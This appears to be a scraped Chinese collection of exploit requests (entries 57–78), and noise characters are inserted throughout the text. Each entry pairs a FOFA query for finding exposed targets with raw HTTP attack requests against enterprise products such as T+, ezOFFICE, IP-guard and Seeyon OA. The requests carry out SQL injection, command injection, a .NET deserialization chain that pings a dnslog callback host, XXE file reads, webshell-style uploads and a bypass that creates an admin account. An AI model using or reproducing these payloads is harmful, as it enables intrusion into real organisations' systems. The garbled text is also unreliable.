POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
$ t! \3 Z) A' a8 Z$ H! r) ]Host: x.x.x.x
- r# I/ g1 C- N, l* [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# w* g. R3 A; v+ d. w4 j4 w3 KContent-Type: application/json, C [- v/ W9 Q4 g* g3 @
, m) F2 M: {& w{
( H8 a' q \8 O" _" X "storeID":{; u8 w4 y& P: |3 a
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
8 s. m/ u; p: ?% w7 h! u- | "MethodName":"Start",
& t% B, }4 d- h "ObjectInstance":{
0 h# t* }7 W$ p) J "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 t! r) a8 O( E! i' S' R' w "StartInfo": {
' h f! I8 E' ]5 d; W3 [: H "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* X3 U/ [ H* K0 J ]. P
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"0 v4 Z9 i$ e3 |% |9 h" e
}
" ~! _9 n0 A" Y. j! ~0 O/ O }
6 `( P7 p4 R9 j }% X3 e) k; V% |/ P
}
( M7 k) i7 R9 ^9 z
* k# H5 f; b3 z5 r, `
; m2 Y/ P' }$ ~- d+ X57. 畅捷通T+ keyEdit.aspx SQL注入
1 J0 u) ^# X; J+ W6 oFOFA:app="畅捷通-TPlus"- t; O5 M! \/ T; c: o; ?
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
S- ?% }2 C- p# W; G! WHost: host
; @7 W1 G3 F# q: d# r2 \User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 `3 ^8 g" i* a+ WAccept-Charset: utf-8/ i3 @: l6 p- v3 i7 q/ R0 C1 ]$ H
Accept-Encoding: gzip, deflate
3 _ z! t8 [. c% fConnection: close
" E3 h0 Y! A' d' f. S* V1 n0 k- v" ?- B/ p
4 h9 P5 T. f8 I7 `5 |+ V58. 畅捷通T+ KeyInfoList.aspx sql注入
+ C1 o3 u* z# j) c3 N% U" h1 rFOFA:app="畅捷通-TPlus"
8 Y3 c/ G9 s8 E. p! d9 \% i+ vGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
6 H$ l; Y) {4 }Host: your-ip
# |# @ S9 V8 u) iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 ^* W' s, R- t+ u
Accept-Charset: utf-8
# r5 L. Y6 m7 Z8 |4 l& vAccept-Encoding: gzip, deflate! ~0 S# E# _; b7 O6 y8 R6 O8 G
Connection: close
' \2 G/ M& ]7 L0 [1 u
5 ~- @4 j' H3 D- R Y2 Y! m3 u- d, p! E# a% n7 p& G. U
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行3 j- @/ ?! H4 X* l# n, f
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
. u$ u1 a( ] Z+ j* u' j0 ], j2 f# sPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.12 u/ z/ g A- F9 x& R% Z9 @
Host: 192.168.86.128:9090% ]5 K. }6 D$ Q) J( B# T, V
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 C3 A; X( a( c* m: `Connection: close
1 d. ~! Y7 N6 c% f& wContent-Length: 16698 v. P& D. S. K( G) M/ c4 l, j
Accept: */*
5 R. P" J1 V8 f4 L) E7 SAccept-Language: en7 H; t# T/ X: J7 R7 r
Content-Type: application/x-www-form-urlencoded/ p1 y$ t( J8 z' q! ^
Accept-Encoding: gzip1 a% {3 `$ O5 [* M, [
1 `, Q- G9 Z" u! }( g! z
PAYLOAD+ w5 [1 _+ k. L4 A
/ Z, T; R0 V8 r9 f7 s8 S/ M
, ^; N* W3 g& J: T60. 百卓Smart管理平台 importexport.php SQL注入
" z1 C4 q. J6 U* BFOFA:title="Smart管理平台"
0 [. m9 |& _- m3 z8 F/ t7 E6 S4 aGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.14 t* F' {/ M0 @, a3 [. ~5 E0 w2 F
Host:
! Z" q8 K. j/ @$ T! L1 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" I4 M6 Y4 h5 {( W9 C7 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- j' U5 j: F. o' eAccept-Encoding: gzip, deflate
7 \$ `9 x6 A$ Z. h" \Accept-Language: zh-CN,zh;q=0.9
7 [% J% R) X" W% |& \2 g5 {Connection: close n' h$ I5 G" F) z5 {8 K, p
8 f, f( {5 T; N% E6 O, A- d# l6 t7 U- k) K& Z- B
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! T u4 U( u$ ], L* ], mFOFA: title="欢迎使用浙大恩特客户资源管理系统"$ C) N1 z& t1 K$ L
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.16 g5 q# C0 ?' Y' l$ n" G
Host: x.x.x.x8 D5 ^: w* \1 Q0 `+ _3 @: [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& _1 B' M( a" u- AConnection: close
; h$ Y5 F7 N. N! Z! pContent-Length: 27
3 s0 } A: j* \. ~4 Z( w. B z% \Accept: */*
* g4 z; _+ T( Z9 g; pAccept-Encoding: gzip, deflate+ I2 d# o! `% R1 L% m
Accept-Language: en1 Q: }6 J4 r: T6 g2 c6 g% f
Content-Type: application/x-www-form-urlencoded" A+ w. B1 @1 S0 f Y; O0 f
& Y1 \% q2 K$ d1 L
8uxssX66eqrqtKObcVa0kid98xa5 @* Q i% R$ _7 Z8 {! W* D, B
' n2 |- X3 {! u4 T9 z! s7 n
6 Q o9 }+ z: `/ M' }! k1 R/ q: M
62. IP-guard WebServer 远程命令执行
, `" s8 C$ k. Z( HFOFA:"IP-guard" && icon_hash="2030860561"
* t5 Q& y3 o' T" U5 XGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1: X: B) R/ B8 U& B7 {5 ~- \
Host: x.x.x.x
2 U$ g( X, n- H/ T2 ]User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
! s, H2 R% a+ v7 b& @Connection: close7 R. y; }8 t# i( E1 E6 H" H
Accept: */*
! c. w9 h. b1 u' ?Accept-Language: en' t9 X4 J! ^! J2 L
Accept-Encoding: gzip
+ V, G' y; T( M7 p- ^
7 y* `* o) C$ t: d
. s. E. |' W1 Y+ p; S8 t访问, a% j$ Z* B" i5 X% v* ^; `( D
3 d) [* h4 z5 Y6 Z' i8 M" ^' IGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.19 a; s/ v0 ^: E L0 e. X
Host: x.x.x.x# j+ n9 f) v: f0 u. [- g
6 Y( H3 r9 E* ]0 d( n; l. d4 g; d; a( }$ ?3 N5 j
63. IP-guard WebServer任意文件读取
3 p" E( ^. W. N! V& f5 BIP-guard < 4.82.0609.0. o* q& `" J& Y; i$ {
FOFA:icon_hash="2030860561"
6 {% r0 E2 w& `- S7 Y* ~- PPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
% l3 Z8 @, j3 N4 N5 K+ N& jHost: your-ip
; @0 Q H% d6 Z* _3 x/ C3 H# cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( C `. X9 R; N2 Q; uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 Z$ I+ {% L- e3 Q8 \
Accept-Encoding: gzip, deflate5 J8 f$ e& q* h- V8 `, D
Accept-Language: zh-CN,zh;q=0.9$ H9 p9 G5 A& k
Connection: close
1 [! `8 i+ l+ ]7 Y; Q9 _3 }Content-Type: application/x-www-form-urlencoded
: H" v0 O2 {# ]# \4 q9 l8 _( e) L5 _# v. Z( V; a. {- u8 c- b/ K
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
- o& R" w" y* [5 E j( S1 \7 j8 ^/ `0 k0 Z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入/ v9 R2 p; R5 r
FOFA:body="/Scripts/EnjoyMsg.js"& n+ |" d/ c4 K$ s
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.18 @. Z4 C1 l; z. P/ R$ l$ i
Host: 192.168.86.128:9001
% P0 Q% H- M- \. G' pUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36. \' u. _. m* b, |3 g8 V
Connection: close
3 V6 d: C' ]/ S8 V' S. nContent-Length: 369& G& H2 r" Z6 l! d# }% W
Accept: */*) c& v5 d" R: l+ ?' y7 H# g* I" e
Accept-Language: en4 l- ?- g t: \( m8 d
Content-Type: text/xml; charset=utf-88 K5 o5 W0 R) d
Accept-Encoding: gzip
! L' W' u# x( ^- n) R5 b5 R
- h4 x' D% M4 J2 [% [7 b8 r2 n<?xml version="1.0" encoding="utf-8"?>5 I+ q' L: V5 B% I. j
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
( Q' U5 g! `) U k8 o<soap:Body>
" q* V2 K" k: G& M- N- \ <GetOSpById xmlns="http://tempuri.org/">
3 o: O" Z# h* X8 G) N V F2 s$ r0 { <sId>1';waitfor delay '0:0:5'--+</sId>+ I, x" ~3 @# k' H% D
</GetOSpById>! t# \9 n8 O( J, _$ r! [( d0 @
</soap:Body># |& X# i4 ^! o8 n
</soap:Envelope>
; s" c! h' V& E" L9 q: w- q2 q/ }4 [ c) ?3 k6 L2 q
6 J' A( u7 ]' E, [8 |' l
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' g6 R! y% _! T) E7 y
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"$ y2 k7 K) e7 V
响应200即成功创建账号test123456/123456
5 A$ N1 T" R, f6 O+ aPOST /SystemMng.ashx HTTP/1.1. }& u/ _+ y# [5 J' V( Q( A
Host:# z2 l! j2 P4 d1 B& W' `
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" M3 T; \2 J d& o
Accept-Encoding: gzip, deflate
$ i9 I3 r5 ?3 K! dAccept: */*$ ~$ ^: ]5 b8 X2 l K2 E
Connection: close- k2 e/ j2 l9 r! M% a/ [
Accept-Language: en8 b1 }2 \* T* j) q {6 Q, @9 Y
Content-Length: 174; {( n3 g, r- d; g
. _# Q; C8 c- K! }4 t. p) PoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
" j% c; U6 |4 q6 A( ]( ?. l `$ i( V, l! A K9 K7 S( U1 k& j; p
: D; K# C* j; n/ }3 U; E& I
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入7 j: V8 X: Y- x v- r* q
FOFA:app="万户ezOFFICE协同管理平台"
( W% z G! _8 g( I' x3 A) }% o9 r% W/ I' Y. T+ ?
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
) x4 B* G; F) X+ cHost: x.x.x.x. ~4 q L% s# h: d$ K( U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
, T5 I* C: {6 U, yConnection: close! B/ I3 e& }, E2 \+ p
Accept: */*$ \. _. Q8 v& _# o- }, _
Accept-Language: en
6 Y2 m4 L5 O& K2 L, GAccept-Encoding: gzip( Q! [9 M" v/ a9 |1 A) [$ @( e
6 T5 e4 M9 ?- \$ K h% z
H, n' R6 d k5 F3 R第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
: d- h* Y) S8 C/ i2 ^# [
4 B% C6 o; d5 c P9 n/ T/ p; {: r67. 万户ezOFFICE wpsservlet任意文件上传$ v- h5 m# ?( b7 B
FOFA:app="万户网络-ezOFFICE"
/ S- q: L, C! @- F7 d% w# r; G/ DnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
) m8 |6 J O: r& Q% J# K3 X% N5 vPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
9 U5 m2 R' {9 ?. ^9 ]Host: x.x.x.x( q/ o. |& r, U9 P( ]% q
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
, A6 x* _+ i; @2 K1 U% W. j' YContent-Length: 173
) `9 ]3 Y& R& g/ y; {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: G! C o2 O+ a5 @2 q; Y
Accept-Encoding: gzip, deflate! W0 Q; U1 o$ c
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+ D; L& M8 J7 X! B* c. \Connection: close
$ l/ Y' m, J4 E9 h& T9 B4 W2 I1 qContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp5 V* ?0 i$ v0 A$ |. X2 n7 k
DNT: 1- c1 g$ t) u, }; a! R" i1 H) y
Upgrade-Insecure-Requests: 1* c2 f/ m n; a
& j+ l- D1 b2 L- P* i--ufuadpxathqvxfqnuyuqaozvseiueerp& E3 }- X- d: P$ G: t& v
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp": ~' p; U/ Y! z/ }5 B
: Z+ @) \1 C8 [" z% u- V2 E<% out.print("sasdfghjkj");%>
3 e! h& Y% q0 Y1 Q4 C+ C- ~* h9 X--ufuadpxathqvxfqnuyuqaozvseiueerp--
, h/ b7 L+ ^, S6 R, M, a& J" h/ X( o7 D* n' o+ q
! P0 K* X% W, z- H文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
8 ]+ e- o) q2 @; `/ t* {6 b0 O8 ?3 }1 h2 z
68. 万户ezOFFICE wf_printnum.jsp SQL注入
8 _1 v" v) n c/ v1 _FOFA:app="万户ezOFFICE协同管理平台"" o; Z, \2 Z8 T/ M' B6 }( \
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 _* B- b! n& ]' U% I# b: E" j
Host: {{host}}& h3 C# @, v* o; k0 y7 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" E5 I5 E- j8 ]% d
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% E* N2 r. ~) q
Accept-Encoding: gzip, deflate0 i9 U5 v% ~0 O! L# p+ X- H
Accept-Language: zh-CN,zh;q=0.9
1 `1 c& B9 B$ h8 ^8 CConnection: close# c4 j, a8 ?; O1 e: P! Q3 V' A; B
2 O& Y: e+ L" z7 _$ v/ E8 `; p
% k( P0 E9 c. A3 Y+ ~4 |69. 万户 ezOFFICE contract_gd.jsp SQL注入
- ], H" c" u1 z$ m1 |$ nFOFA:app="万户ezOFFICE协同管理平台"
0 g8 v, r$ A# j1 x9 NGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
0 ?: ~" [9 D7 i$ yHost: your-ip0 V7 k, p" `: E+ q
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
: ~ ~4 D2 i3 @Accept-Encoding: gzip, deflate
- h u2 n1 I. a( S! WAccept: */*3 b* l$ T" O" o e. U9 y& {2 b- {
Connection: keep-alive
# Z# w8 I# q1 L( F/ F
1 }0 c" H7 G/ M; u
0 z& J5 h2 Q9 [6 g( ~. t7 X7 G70. 万户ezEIP success 命令执行
8 d( E7 t' b% F4 fFOFA:app="万户网络-ezEIP"
. `" |+ k7 O) k* n% ]. NPOST /member/success.aspx HTTP/1.1
6 z& T) T. T9 `Host: {{Hostname}}
' X( x' u4 P `, S( CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 C) x+ I2 }- A! U0 q4 O
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=( y" e0 \2 |* J6 z" O
Content-Type: application/x-www-form-urlencoded
3 A$ Z, K$ t3 F# D2 D- @TYPE: C6 L E U: g4 C6 e
Content-Length: 167029 ?0 N5 Y( m1 `0 ]' t6 F# \
8 |! U! l* b( ^9 i3 y8 H3 W& I3 }__VIEWSTATE=PAYLOAD/ [$ u" {! D' ^4 o$ L
8 V$ \; l" ]5 b$ D
" b3 r* K* V/ `* q/ D( e71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入 ]! p! u; w, H% _: @7 K
FOFA:body="PM2项目管理系统BS版增强工具.zip"
2 P8 l- z$ d; m: BGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.15 f- T4 u& _+ l8 {5 C
Host: x.x.x.xx.x.x.x
! l1 z" E0 n/ D- v% QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36, b% I4 u( q1 h1 |9 t# S
Connection: close7 M. \5 p6 n |" f) g# W, v% F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# c5 t, T w$ X! x2 MAccept-Encoding: gzip, deflate; j# _0 r+ _6 u- E3 p- U; G" {9 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! h) b2 B% |7 @7 o& j4 S3 \, {
Upgrade-Insecure-Requests: 1
$ i; u- I/ `9 t& c& x' B) p: W j7 N/ g" f3 R5 A/ H
) K" f0 M9 d Y4 Z
72. 致远OA getAjaxDataServlet XXE. \& |: d# V$ m
FOFA:app="致远互联-OA"/ x/ v3 j0 X& T+ u
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
; f. v) ?( |# Y3 W0 |/ LHost: 192.168.40.131:8099; r1 L+ T2 h8 F6 I) J' i
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- v, G; ^) p& v0 [3 d0 T
Connection: close. o2 N" i0 R7 H/ q7 ~
Content-Length: 583
4 ^ ?5 \4 Z+ v4 bContent-Type: application/x-www-form-urlencoded0 }- [4 \) g( q z
Accept-Encoding: gzip' e/ E/ q; d8 u6 I5 `; i
! D( R% B2 V3 ?6 s, E5 v3 ?S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
- x9 U' p0 H/ g! O( a$ p; y; D1 F
+ y7 s' a, `. m
0 }1 b, W% q3 ~5 {73. GeoServer wms远程代码执行
# j$ c0 A/ r# _0 n+ HFOFA:icon_hash=”97540678”
, o# G, N$ l6 D* L. ]. VPOST /geoserver/wms HTTP/1.1
( x! F0 M }$ l2 PHost:
' Z, h4 M1 H) B5 Z) R/ Y0 e; a( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. ~% h6 p' N* b `) v8 t
Content-Length: 19815 k, M. D' v% r, O
Accept-Encoding: gzip, deflate; a2 j3 P( f3 p2 f0 m
Connection: close2 U0 q" v! c7 c% Z& M! K
Content-Type: application/xml# w. X% w; ^% z' D( ?
SL-CE-SUID: 3
, T3 v6 {, E) N$ G0 U& y- B/ V8 k8 b# s" i) u
PAYLOAD; V3 ~% G2 }* y* L: ^1 D
. L# f7 q4 H- |' m
, c( }3 H0 a0 o* j74. 致远M3-server 6_1sp1 反序列化RCE' m" l) ~+ R- y$ N+ Z
FOFA:title="M3-Server"
; n, t. R' Y3 k- t0 T6 f* ~PAYLOAD$ u, t. @ x0 D' t$ @* K/ P
7 [6 f% D. U$ _5 D$ l" f4 a F1 G; J7 M! ?
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' U' q& W, n7 F6 ZFOFA:app="TELESQUARE-TLR-2005KSH"
2 `% U, L' Z5 h- e) XGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
2 G @$ [# o+ t0 [7 i+ KHost: x.x.x.x
) k( h y3 s" A+ g2 |1 o! IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 }" n7 E3 N- C* ^6 AConnection: close
: ?6 w$ K t" _- QAccept: */*
6 Z# T8 U; V0 A. x$ d5 K! }Accept-Language: en
2 [& d3 e; Z0 _1 _5 c6 hAccept-Encoding: gzip% m% j" O$ Q8 [* f5 A) Z
O0 y- b/ ? H7 O' ~4 @
: s" L- k+ E Z. K6 m
GET /cgi-bin/test28256.txt HTTP/1.10 o- o! V( l/ r0 ^% i+ M
Host: x.x.x.x
: N5 p. h* O$ c+ I9 `3 x1 u& ?4 ]5 M) b4 F B$ D: a7 v
- r/ x4 b- h+ A( G( p- h# w- R! w
76. 新开普掌上校园服务管理平台service.action远程命令执行
9 d: d# F+ d+ t( Y4 TFOFA:title="掌上校园服务管理平台"
2 J5 ~. \" G/ n& _4 EPOST /service_transport/service.action HTTP/1.1
' b: k0 T! ]) n6 p4 |Host: x.x.x.x
1 I. B+ l4 }. r7 T( u" ~1 g8 h0 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0+ H$ T& ?: O/ @* A
Connection: close
- a/ W, U8 g5 b! L3 m6 D0 HContent-Length: 211
; E9 W' b! i/ ?* wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 v) N& G* j2 ?. y$ @1 Y. i" Q: D1 }Accept-Encoding: gzip, deflate3 C/ H/ N; Y. u. F/ T2 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 L9 ~8 j3 S, m! ZCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4. z0 N* f" D2 z$ n% Z( h( v H
Upgrade-Insecure-Requests: 1
6 h( w8 k+ j4 N4 z8 c; F! n& F% `
- o( R+ V( t- E{
+ A% U2 v, g( B8 u# l- C"command": "GetFZinfo",
; e+ w) P! G2 G$ B/ A "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
5 v: ?( m# J3 C! L+ I: m ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
; [8 Z! ]) F5 y' v* ?# l/ [6 k( B} K- ~& V3 S5 K3 y6 r1 C
, v. S1 X) f' X- x
4 ^( U) j- z; D* S: ^
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
. H; ^9 }+ i0 T* f5 o5 NHost: x.x.x.x& q9 X6 y& H o+ l
( x/ l q, ?+ X: Q' K& {
/ k& M2 N% ]7 z9 m) B/ d' o
# E. O( |& m. Q2 N+ u& ]9 o77. F22服装管理软件系统UploadHandler.ashx任意文件上传
' V. m/ U/ q' b" F' b# r4 V. ?3 HFOFA:body="F22WEB登陆"
! A" @: Q2 J' _6 e4 nPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
5 R& ^, \; o3 g# K! w, ^3 kHost: x.x.x.x7 v4 M8 Y% g! i) ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- C. g& O& u4 ]" g
Connection: close& `* \" ]9 M+ ~* z' W
Content-Length: 4330 ?0 P$ V Z# g9 N, T, [
Accept: */*' C5 `( e( M6 _7 T: Q1 L8 Q
Accept-Encoding: gzip, deflate1 _6 k' A3 M* M z j0 q9 k& p& z
Accept-Language: zh-CN,zh;q=0.9
! h4 e- e" T. j7 JContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix' A( w J/ \0 ]3 O
- f' }0 Y. E6 Z ], g; z------------398jnjVTTlDVXHlE7yYnfwBoix
! S/ M! u% D) ^' H4 I# |$ }Content-Disposition: form-data; name="folder"2 N& @' L2 G2 d! Y
" @0 N+ N7 Y3 a4 s3 o3 T
/upload/udplog' C1 _) K3 O f
------------398jnjVTTlDVXHlE7yYnfwBoix' m+ X1 ^, k& {1 B4 i6 d) c; ?
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
6 {: m6 B' F8 X6 @9 `Content-Type: application/octet-stream
$ b, {1 A( j) o8 y8 D* m! \$ Z2 b: _2 s/ u8 h: A
hello1234567
7 ~; b. o# o* n7 V------------398jnjVTTlDVXHlE7yYnfwBoix
" _3 Q3 E1 y" \/ a- _Content-Disposition: form-data; name="Upload", J1 ?% d3 q n! A% p
* x# B, H8 \ g( Z h6 \Submit Query
: H$ j) X: X$ z. h------------398jnjVTTlDVXHlE7yYnfwBoix--0 s. r7 Q& o2 y$ A7 K. \1 c
: N4 `& }$ S8 r7 m4 `
) e& \1 q2 m. y' h4 [4 L- N78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传: ?& k8 d$ Y9 |9 P/ e
FOFA:icon_hash="2001627082"& c/ [0 A% b" ]: c3 k9 L
POST /Platform/System/FileUpload.ashx HTTP/1.1) D* K9 s& L: X( y: s. V
Host: x.x.x.x
+ C N b* B$ ]! L' ]9 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. d2 c0 _( e: Z$ v; F( dConnection: close+ d' l+ p6 _) b+ Z9 ^ r6 P8 |
Content-Length: 336
* C/ k# h/ ^1 SAccept-Encoding: gzip
8 }7 I/ a7 n) j' }9 l+ u. G; P' kContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l/ O& Z+ w# H9 ]
+ V5 B2 ~2 I( V! C ^
------YsOxWxSvj1KyZow1PTsh98fdu6l
6 y3 j% X" q9 c! x/ AContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"5 N6 [/ @; F2 o$ x5 x' o
Content-Type: image/png, Y3 f: K ?" ~. s1 H9 ?- J7 q( x
$ u7 V! v6 {: f5 L$ R8 ^
YsOxWxSvj1KyZow1PTsh98fdu6l! D& \( m0 A+ E) U
